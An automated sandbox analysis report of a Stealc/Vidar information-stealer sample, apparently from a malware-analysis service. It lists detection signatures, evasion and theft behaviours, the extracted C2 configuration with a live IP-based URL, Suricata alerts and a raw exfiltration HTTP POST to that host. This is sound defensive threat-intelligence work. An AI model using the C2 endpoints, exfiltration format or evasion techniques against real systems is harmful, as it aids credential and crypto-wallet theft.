Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1532570
MD5:	c582a9038fe13bfcf8c7f11db6a6877a
SHA1:	50ad639757744808ab570da6229ddfe1cd4ed432
SHA256:	a4df7d0b5f032022d53e71a0935fe2035eb79c12cef9237a1cd8a2b583f3849e
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C582A9038FE13BFCF8C7F11DB6A6877A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1734725607.0000000004B20000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 7568	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7568	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7568	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.970000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T17:46:09.025919+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T17:46:09.019726+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T17:46:09.244891+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T17:46:10.221984+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T17:46:09.251899+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.4	49730	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T17:46:08.795553+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.4	49730	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T17:46:10.890194+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:16.292425+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:17.376394+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:18.005514+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:18.618885+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:20.556493+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP
2024-10-13T17:46:21.299286+0200	2803304	3	Unknown Traffic	192.168.2.4	49730	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKKJKEHDBGIDGDHCFHIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 44 38 37 35 46 32 42 32 31 35 33 32 35 36 34 35 30 37 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4b 4a 4b 45 48 44 42 47 49 44 47 44 48 43 46 48 49 2d 2d 0d 0a Data Ascii: ------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="hwid"D9D875F2B2153256450765------KJKKJKEHDBGIDGDHCFHIContent-Disposition: form-data; name="build"doma------KJKKJKEHDBGIDGDHCFHI--

Source: file.exe, 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1931818281.0000000000887000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dlle
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dll&Q
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.1931818281.0000000000887000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.1931818281.0000000000887000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/a
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.dll16X
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php36
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4cF
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpA6
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpLb
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpPb
Source: file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpR
Source: file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl6
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phplS6
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phplc
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpnomi
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpowsApps
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phppc
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpre
Source: file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpy6
Source: file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37_S
Source: file.exe, 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phption:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.1945327275.000000001D252000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958458408.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: AKFHCAKJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: AKFHCAKJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AKFHCAKJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AKFHCAKJ.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: AKFHCAKJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AKFHCAKJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: AKFHCAKJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BFCFBFBFBKFIDHJKFCAF.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	String found in binary or memory: https://support.mozilla.org
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1804973566.000000001D15C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1804973566.000000001D15C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: AKFHCAKJ.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1955076993.00000000291F2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, BFCFBFBFBKFIDHJKFCAF.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: AKFHCAKJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: AFHDAKJKFCFBGCBGDHCBAFCAKE.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
